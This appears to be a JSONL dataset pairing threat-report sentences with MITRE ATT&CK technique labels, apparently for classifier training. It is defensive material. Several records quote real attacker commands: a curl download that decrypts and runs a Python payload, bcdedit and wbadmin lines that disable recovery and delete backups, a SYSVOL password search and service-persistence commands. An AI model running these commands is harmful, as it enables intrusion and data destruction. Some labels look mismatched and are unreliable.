{"text1":"Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.","labels":"['T1212']"}
{"text1":"Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping.","labels":"['T1003.001', 'T1003.003']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.","labels":"['T1083']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network.","labels":"['T1069']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information.","labels":"['T1046']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information.","labels":"['T1018']"}
{"text1":"Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.","labels":"['T1210']"}
{"text1":"Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.","labels":"['T1560']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.","labels":"['T1074']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes.","labels":"['T1114']"}
{"text1":"Chinese state-sponsored cyber actors have been observed: \uf0b7 Using commercial cloud storage services for command and control. \uf0b7 Using malware implants that use the Dropbox API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive API.","labels":"['T1071']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.","labels":"['T1571']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.","labels":"['T1090.003']"}
{"text1":"The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user.","labels":"['T1190']"}
{"text1":"The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes.","labels":"['T1078.002']"}
{"text1":"The actors used a modified and obfuscated version of the reGeorg web shell to maintain persistent access on a target's Outlook Web Access (OWA\u00ae ) server.","labels":"['T1505.003']"}
{"text1":"The actors operate a Kubernetes cluster, which allows them to conduct distributed and large-scale targeting using password spray and password guessing","labels":"['T1110.003']"}
{"text1":"The actors dumped LSASS process memory by using 'rundll32.exe' to execute the MiniDump function exported by the native Windows\u00ae DLL 'comsvcs.dll'.","labels":"['T1003.001']"}
{"text1":"The actors mapped network drives using 'net use' and administrator credentials.","labels":"['T1021.002']"}
{"text1":"The actors collected email from Office 365 using a compromised valid service account with elevated privileges.","labels":"['T1114.002']"}
{"text1":"The actors named one instance of their web shell 'outlookconfiguration.aspx' likely for the purpose of appearing to be a legitimate webpage on a targeted OWA server.","labels":"['T1036.005']"}
{"text1":"The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS.","labels":"['T1048.002']"}
{"text1":"The actors split some archived exfiltration files into chunks smaller than 1MB.","labels":"['T1030']"}
{"text1":"SVR target organisations who supply privileged software to intelligence targets.","labels":"['T1195.002']"}
{"text1":"SVR leveraged access gained from the SolarWinds campaign to compromise a certificate issued by Mimecast, which it then used to authenticate a subset of Mimecast's products with customer systems.","labels":"['T1199']"}
{"text1":"The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591)","labels":"['T1190']"}
{"text1":"The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity: Support Help elie WADGUtilityAccount","labels":"['T1136.001', 'T1136.002']"}
{"text1":"The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. sar_addr@protonmail[.]com WeAreHere@secmail[.]pro nosterrmann@mail[.]com nosterrmann@protonmail[.]com","labels":"['T1486']"}
{"text1":"The actors used two Impacket tools: wmiexec.py and smbexec.py.","labels":"['T1059.006']"}
{"text1":"Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.","labels":"['T1129']"}
{"text1":"Actors used the del.exe command with the \/f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards.","labels":"['T1070.004']"}
{"text1":"Actors used Windows command shell commands to detect and avoid virtualization and analysis environments.","labels":"['T1497.001', 'T1497.001']"}
{"text1":"The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY.","labels":"['T1218']"}
{"text1":"In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as public key or keyboard-interactive authentication. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.","labels":"['T1480']"}
{"text1":"In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as keyboard-interactive authentication or public key. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.","labels":"['T1480']"}
{"text1":"The size of the PuTTY binary downloaded by the victim is also substantially larger than the legitimate version. Upon closer inspection, it has a large, high entropy .data section in comparison to the officially distributed version (Figure 3). Sections like these are typically indicative of packed or encrypted data.","labels":"['T1027.002']"}
{"text1":"The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis.","labels":"['T1620']"}
{"text1":"Commands passed as arguments into e.py were also seen being executed by the targeted Windows guest machine, running as a child process under vmtoolsd.exe. This execution chain can be seen in Figure 5. The parent binary \/bin\/rdt was not present on disk but was able to be recovered by dumping the processes memory of the ESXi hypervisor. The python script that sent out commands to the guest machines, e.py, was unable to be recovered.","labels":"['T1202']"}
{"text1":"Deleted File created by vmtoolsd.exe and executed by vmtoolsd.exe child process.","labels":"['T1070.004']"}
{"text1":"The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps:\/\/85.206.161[.]216:8080\/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC).","labels":"['T1620']"}
{"text1":"Efforts to decrease operational visibility included placing tool and output files within temporary file system mount points that were stored in volatile memory. Additionally, UNC1945 used built-in utilities and public tools to modify timestamps and selectively manipulate Unix log files.","labels":"['T1070.006']"}
{"text1":"UNC1945 employed anti-forensics techniques with the use of a custom ELF utility named LOGBLEACH. The actor used built-in Linux commands to alter the timestamps of files and directories and used LOGBLEACH to clean logs to thwart forensic analysis, as seen in Figure 4.","labels":"['T1070.006']"}
{"text1":"BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during intrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass Windows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes, and for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return S_OK. The technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both 32bit and 64bit variants of BOATLAUNCH have been observed using the following export directory DLL names.","labels":"['T1055']"}
{"text1":"Actors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine. The threat actor used route print to display the entries in the local IP routing table.","labels":"['T1016']"}
{"text1":"Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP.","labels":"['T1049']"}
{"text1":"Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running","labels":"['T1057']"}
{"text1":"Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine","labels":"['T1082']"}
{"text1":"Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system.","labels":"['T1083']"}
{"text1":"Actors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string.","labels":"['T1039']"}
{"text1":"The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\\he\\debug directory.","labels":"['T1074.002']"}
{"text1":"Conti ransomware deletes Windows Volume Shadow Copies using vssadmin.","labels":"['T1490']"}
{"text1":"Conti ransomware stops up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.","labels":"['T1489']"}
{"text1":"Conti ransomware can spread itself by infecting other remote machines via network shared drives.","labels":"['T1080']"}
{"text1":"Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and check to ensure IP addresses it connects to are for local, non-internet systems.","labels":"['T1016']"}
{"text1":"Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\" \/c mavinject.exe 568 \/injectrunning c:\\Drivers\\DriverGFY.db\"","labels":"['T1218.013']"}
{"text1":"The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017.","labels":"['T1218.013']"}
{"text1":"Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.","labels":"['T1218.008', 'T1218.007', 'T1218.002', 'T1218.011']"}
{"text1":"Compiled HTML File (CHM) are commonly Microsoft help files. These file will be a compiled HTML files that includes documents , image , scripts etc. Hackers will abuse these files to embed malicious payload with CHM files. CHM files can be executed by HH.exe , which is a Microsoft windows utility. Adversaries use this techniques to evade AV or application blacklisting techniques.","labels":"['T1218']"}
{"text1":"When users run the malicious CHM file, the HTM file\u2019s code is executed. The script decompiles the CHM file through hh.exe and runs LBTWiz32.exe. It then creates a normal image file (KBSI_SNS_003.jpg) on the PC screen, making it difficult for users to recognize malicious behaviors.","labels":"['T1218']"}
{"text1":"LBTWiz32.exe that is run is a normal program. However, the malicious DLL (LBTServ.dll) created on the same path through DLL hijacking is loaded and starts operating. The malicious DLL creates and executes a malicious VBE file (ReVBShell) in the %TEMP% folder. Figures 2 to 4 show parts of the decoded VBE code.","labels":"['T1574']"}
{"text1":"Mimikatz creates a new server and nTDSDSA objects in the Active Directory forest Configuration partition. Next, it updates the SPN (Service Principal Name) of the computer hosting the rogue domain controller to \u201cGC\u201d (Global Catalog) and \u201cE3514235-4B06-11D1-AB04-00C04FC2DCD2\u201d (Active Directory Replication). The rogue domain controller is now registered and capable of replicating data to other domain controllers.","labels":"['T1207']"}
{"text1":"this is a late-stage kill chain attack that allows a threat actor with admin (domain or enterprise admin) credentials to leverage the replication mechanism in AD to register a rogue domain controller in order to inject backdoor changes to an AD domain. With that rogue DC, the attacker can manipulate AD data, including objects, and schemas.","labels":"['T1207']"}
{"text1":"With DCShadow, attackers no longer have to replicate data, but can register new domain controllers in the targeted infrastructure to inject backdoor changes in AD objects, or alter existing ones by replacing the attributes\u2019 values.","labels":"['T1207']"}
{"text1":"If an attacker has domain admin permissions, he can steal the DC backup key and as a result, decrypt all the domain users\u2019 master keys. The Mimikatz module allowing to extract the domain backup key is lsadump::backupkeys. This module first calls the API functions LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION as the DesiredAccess argument, so it will be able to call the function LsaRetrievePrivateData after-","labels":"['T1207']"}
{"text1":"The Nefilim ransomware creates a new wermgr.exe (the Windows error reporting manager) process and injects its payload to evade process-based defenses.","labels":"['T1055']"}
{"text1":"Nefilim uses WerFault.exe and wermgr.exe for DLL Side Loading, a defense evasion technique used by adversaries to execute malicious payloads by hijacking the library manifest used to load DLLs. Werfault.exe is the Windows Error Reporting binary used by many different programs to report errors.","labels":"['T1574.002']"}
{"text1":"Nefilim uses the following  \u2018timeout\u2019 command to delay the execution of the \u2018del\u2019 command. Adversaries use this command also to evade sandbox analysis. C:\\Windows\\System32\\cmd.exe\" \/c timeout \/t 3 \/nobreak\"","labels":"['T1497.003']"}
{"text1":"The Nefilim ransomware uses IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware\u2019s behavior at the run-time. In the presence of a debugger,  malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging.","labels":"['T1518.001']"}
{"text1":"Nefilim reads the hosts file (C:\\Windows\\System32\\drivers\\etc\\hosts) to get a listing of other systems by IP addresses and hostnames on the network that may be used for Lateral Movement from the current system.","labels":"['T1018']"}
{"text1":"The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts.","labels":"['T1570']"}
{"text1":"The Nefilim ransomware creates a DirectInput object using the DirectDrawCreateEx function to capture keystrokes. Keylogging is both a Credential Access and Collection tactic.","labels":"['T1056.001']"}
{"text1":"Like other ransomware threats, Nefilim encrypts files on the target system using AES-128 and adds NEFILIM, NEPHILIM, MERIN, TRAPGET, MEFILIN, TELEGRAM, SIGARETA, or OFFWHITE  extension to encrypted files. It uses an RSA-2048 public key embedded in the ransomware executable to encrypt the AES encryption key. It also adds a file that includes the ransom note to the root directory, such as C:\\NEFILIM-DECRYPT.txt.","labels":"['T1486']"}
{"text1":"Deleting volume shadow copies is very typical behavior of ransomware. The Nefilim ransomware uses WMIC with the following command to delete all volume shadow copies on the system to prevent recovery. WMIC  is a command-line utility to access WMI.","labels":"['T1490']"}
{"text1":"Nefilim also uses bcdedit.exe twice to disable automatic Windows recovery features by modifying boot configuration data. bcdedit \/set {default} recoveryenabled No bcdedit \/set {default} bootstatuspolicy ignoreallfailures Moreover, the Nefilim ransomware uses wbadmin to delete the backup catalog: wbadmin delete catalog -quiet","labels":"['T1490']"}
{"text1":"Mandiant assesses with moderate confidence that the threat actor obtained the session token from the operators of the info-stealer malware. These tokens were used by the actor via public VPN providers to authenticate to the target\u2019s Microsoft 365 environment.","labels":"['T1550.004']"}
{"text1":"To authenticate to vCenter the threat actor used a stolen session cookie for a Privileged Access Management (PAM) account.","labels":"['T1550.004']"}
{"text1":"In a particular campaign, Mandiant identified that the threat actor performed initial reconnaissance via a VPS provider located in the same region as the victim. Mandiant believes a misconfiguration by the threat actor meant that the VPN services running on the VPS stopped functioning after 8 hours.","labels":"['T1583.003']"}
{"text1":"APT41 used a malware variant called WIDETONE to conduct port scans on the specified subnets.","labels":"['T1046']"}
{"text1":"Figure 7 shows how DCRat collects the public IP address from the compromised host by accessing the IP web service named as \u201chttps[:]\/\/ipinfo[.]io\/json\u201d.","labels":"['T1590.005']"}
{"text1":"DCRat will also drop a .bat file containing a script that runs the W32tm \u201cstripchart\u201d command on the compromised host. This command is used as a delay tactic for its execution and beaconing.","labels":"['T1124']"}
{"text1":"The following analytic detects a powershell script that enumerates the camera mounted to the targeted host.","labels":"['T1592.001']"}
{"text1":"The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%.","labels":"['T1547.009']"}
{"text1":"We detect the attachment file as W97M\/Adnel or MHT\/Dloader. This macro malware is usually attached in the spam emails as .doc files. It uses social engineering tricks to be able to run the malicious macro script that is disabled by default in Microsoft Office.","labels":"['T1586.001']"}
{"text1":"APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers.","labels":"['T1586.001']"}
{"text1":"We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.","labels":"['T1218.004']"}
{"text1":"Version.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a legitimate java binary used to check for any updates. This file will load version.dll upon its execution. Version.dll is an unsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32, but retains its PE header. An additional import was added to the modified version.dll, which imports the malicious function from javafx_font.dll.","labels":"['T1574.002']"}
{"text1":"Prior to executing BOOMMIC APT29 was observed creating persistence via a registry key for \u201cJava Update\u201d that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload. Figure 19: BOOMMIC Persistence reg  add HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" \/v \"Java Update\" \/t REG_SZ \/d \"c:\\users\\<redacted>\\appdata\\local\\Java\\jucheck.exe\"\"","labels":"['T1112', 'T1547.001']"}
{"text1":"APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. APT29 GPP password datamining C:\\WINDOWS\\system32\\cmd.exe \/C findstr \/S \/I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml","labels":"['T1003.008']"}
{"text1":"One notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences.","labels":"['T1552.006']"}
{"text1":"Because the DLL\/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL\/EXE) to load in to memory on the remote system, this will load and execute the DLL\/EXE in to memory without writing any files to disk.","labels":"['T1620']"}
{"text1":"Attackers modified the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file.","labels":"['T1553']"}
{"text1":"A threat actor can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features, which rely on MOTW tagging \u2013 for example, \u2018Protected View\u2019 in Microsoft Office. This zero-day has a moderate CVSS risk score of 5.4, because it only helps to avoid the Microsoft Defender SmartScreen defense mechanism, which has no RCE or DoS functionality.","labels":"['T1553.005']"}
{"text1":"Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy.","labels":"['T1553.005']"}
{"text1":"CVE-2022-42821 allows hackers to bypass Gatekeeper by setting restrictive Access Control Lists (ACLs) using specially-crafted payloads that prohibit Safari, web downloaders or any other program through which an app is downloaded from setting com.apple.quarantine attribute to the downloaded file\/application\/software.","labels":"['T1553.001']"}
{"text1":"The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; python \/tmp\/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in \/private\/tmp\/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"","labels":"['T1553.001']"}
{"text1":"To summarize, the Mach-O does the following: Downloads a file from the URL supplied as an argument Decrypts this file using AES-128-EBC and TEA with a custom delta Writes the resulting file to $TMPDIR\/airportpaird and makes it executable Uses the privilege escalation exploit to remove the com.apple.quarantineattribute from the file to avoid asking the user to confirm the launch of the unsigned executable","labels":"['T1553.001']"}
{"text1":"copy %~dp0%DLL_NAME%\" \"%WORK_DIR%\" \/Y reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" \/v \"%SERVICE_NAME%\" \/t REG_MULTI_SZ \/d \"%SERVICE_NAME%\" \/f sc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\" SC failure \"%SERVICE_NAME%\" reset= 86400 actions=\"","labels":"['T1055']"}
{"text1":"The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL.","labels":"['T1055.012']"}
{"text1":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","labels":"['T1562.001', 'T1070.004', 'T1112']"}
{"text1":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","labels":"['T1110']"}
{"text1":"BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download.","labels":"['T1105']"}
{"text1":"The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).","labels":"['T1203', 'T1588.006', 'T1587.004', 'T1499.004', 'T1190', 'T1210', 'T1588.005']"}
{"text1":"Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.","labels":"['T1588.002', 'T1562', 'T1570']"}
{"text1":"Monero miner scripts are downloaded from TeamTNT\u2019s server and piped to \u201cbash\u201d using a SSH session on the underlying host as the \u201croot\u201d user by supplying the private key from \u201c\/tmp\/TeamTNT.\u201d Later, the private key \u201c\/tmp\/TeamTNT\u201d is removed as well.","labels":"['T1098.004', 'T1195', 'T1588.002', 'T1059.004', 'T1021.004', 'T1552.004', 'T1588.001']"}
{"text1":"the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections.","labels":"['T1587.001', 'T1546.001']"}
{"text1":"The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.","labels":"['T1584.001', 'T1583.001', 'T1587.001', 'T1588.001']"}
{"text1":"In one instance, FIN13 deployed a backdoor called MAILSLOT, which communicates over SMTP\/POP over SSL, sending and receiving emails to and from a configured attacker-controlled email account for its command and control. MAILSLOT makes FIN13 a rare case of a threat actor who has used email communications for C2.","labels":"['T1102.003']"}
{"text1":"In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026 .","labels":"['T1219']"}
{"text1":"The cheat sheet is separated into several sections, based on the purpose of the example commands. Fortunately, the commands listed in the cheat sheet provides us with a great deal of insight into some of the tools and techniques the actors will possibly use after compromising the end system. The cheat sheet shows significant batch and PowerShell scripting and a preference for using RDP, as well as the following tools not provided natively in Windows (i.e. thc-hydra, Plink, Mimikatz, Powercat, ProcDump, SharpHound\/BloodHound and PowerSploit). Table 1 shows the headers and a description of each section within the cheat sheet.","labels":"['T1059.003', 'T1059.001']"}
{"text1":"Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam.","labels":"['T1098.002', 'T1566']"}
{"text1":"When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1.","labels":"['T1132', 'T1041']"}
{"text1":"Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module.. Hajime: This round of update from Hajime also includes GPON exploits.. Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate mirai variants. The second one is already known as Omni.. Imgay: This looks like a botnet under development. We only observe its download behavior and no more follow-up actions.","labels":"['T1588.006', 'T1587.004', 'T1203', 'T1595.002']"}
{"text1":"CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.","labels":"['T1083']"}
{"text1":"The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload","labels":"['T1059.001', 'T1570']"}
{"text1":"Attempts to dump the contents of \/etc\/passwd and \/etc\/shadow to enable offline password cracking.","labels":"['T1003.008', 'T1110.002']"}
{"text1":"Five minutes after the automated reconnaissance activities are completed, the QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via a rundll32.exe child process with the \u201cmain\u201d export function.","labels":"['T1218.011']"}
{"text1":"Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077.","labels":"['T1588.006']"}
{"text1":"Vidar is an info-stealer. It downloads DLL files freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from its C&C for use in password-grabbing routines.","labels":"['T1588.001']"}
{"text1":"DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.","labels":"['T1021.005', 'T1592']"}
{"text1":"QAKBOT can use Regsvr32 to execute malicious DLLs","labels":"['T1218.010', 'T1588.002']"}
{"text1":"LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF.","labels":"['T1555', 'T1555']"}
{"text1":"Adds registry run keys to achieve persistence. In some cases, we observed using the following command:start cmd.exe \/k runonce.exe \/AlternateShellStartup","labels":"['T1547.001']"}
{"text1":"Further reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe are used.","labels":"['T1033']"}
{"text1":"Volexity reported yesterday that its analysts had identified approximately 1,600 ZCS servers that they believe were compromised by threat actors leveraging CVE-2022-41352 to plant webshells","labels":"['T1588.006']"}
{"text1":"PrivateLoader is yet another example of a Pay-Per-Install malicious loader like LgoogLoader and SmokeLoader. It uses a single-byte XOR encryption key to receive URLs from the control center.","labels":"['T1587.001']"}
{"text1":"MedusaLocker is a ransomware family that was first seen in the wild in early October 2019. In January 2020, a fork of MedusaLocker named Ako was observed, which has been updated to support the use of a Tor hidden service to facilitate a RaaS model. Operators of the Ako version of the malware have since implemented a DLS (Figure 12). At least nine victims have been published to the site since its inception.","labels":"['T1588.001']"}
{"text1":"However, the program turned out not to be a Gpcode variant. This new version of Bancos.aam turned out to be the first Trojan spy program designed to steal data from users of the Russian QUIK system. ","labels":"['T1587.001']"}
{"text1":"On Tuesday, Jan. 11, 2022, Emotet resumed spamming after its holiday break. The emails continued with links to fake complaint pages, and the pages were sometimes customized to include the recipient\u2019s name. This method was prevalent until Jan. 20.","labels":"['T1566.002', 'T1566.002']"}
{"text1":"NotPetya has the capability to exploit SMBv1 via the well known EternalBlue exploit. Once the exploit is launched, the shellcode will end up writing the file and executing the malware on the target machine.","labels":"['T1203']"}
{"text1":"CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year\u2019s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016\u2019s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below.","labels":"['T1203', 'T1588.005']"}
